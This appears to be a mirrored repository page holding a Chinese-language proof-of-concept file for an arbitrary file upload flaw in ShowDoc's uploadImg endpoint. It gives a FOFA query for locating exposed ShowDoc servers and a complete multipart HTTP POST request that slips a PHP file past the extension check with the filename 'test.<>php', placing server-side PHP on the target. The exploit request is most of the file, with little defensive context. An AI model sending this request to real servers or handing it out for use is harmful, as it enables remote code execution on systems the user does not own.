admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/showdoc/showDoc-uploadImg任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

29 lines
957 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## showDoc-uploadImg任意文件上传漏洞
showdoc是一个非常适合IT团队的在线API文档、技术文档工具它可以提高团队成员之间的沟通效率 使用此系统的用户众多目前github star 10k+。showdoc使用php+sqlite其历史版本接口 /index.php?s=/home/page/uploadImg 存在文件上传漏洞。
## fofa
```
app="ShowDoc"
```
## poc
```
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101
Firefox/88.0
Content-Length: 240
Content-Type: multipart/form-data; boundary=--------------------------7
Accept-Encoding: gzip
----------------------------7
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
<?php phpinfo();?>
----------------------------7--
```
![image-20240531130717905](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405311307017.png)
Reference in New Issue View Git Blame Copy Permalink